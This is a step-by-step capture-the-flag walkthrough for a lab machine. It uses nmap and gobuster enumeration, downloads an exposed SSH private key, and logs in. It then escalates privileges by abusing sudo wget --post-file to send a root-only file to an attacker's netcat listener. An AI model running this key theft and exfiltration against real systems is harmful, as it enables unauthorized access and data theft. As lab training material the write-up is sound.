- Port scan
nmap -Pn <ip>
2. OS and Services scan
nmap -A -p 22,80 <ip>
3. Access HTTP Site
3. View page source, there’s a message. Seems like there’s username, which is jessie or Jessie.
4. Scan with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
There’s sitemap
Access /sitemap, nothing much.
5. Scan sitemap with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/sitemap/ -x php,txt,html
Nothing much, because I already accessed these pages.
6. Scan sitemap with gobuster with another wordlist
gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html
7. Now I found private key of ssh service
8. Download it
wget http://<ip>/sitemap/.ssh/id_rsa
9. Change permission
chmod 600 id_rsa
10. Login with SSH
ssh -i id_rsa jessie@<ip>
11. Explore /home/jessie
lscd Desktoplscd ..cd Documentslscat user_flag.txt
12. Check if jessie can use sudo
sudo -l
There’s wget. I can use it to send root flag to my machine.
13. Create listener for root flag file
nc -lvp 80 > root.txt
14. Send file
sudo wget --post-file=/root/root_flag.txt <attacker ip>
15. Read root flag file
lscat root_flag.txt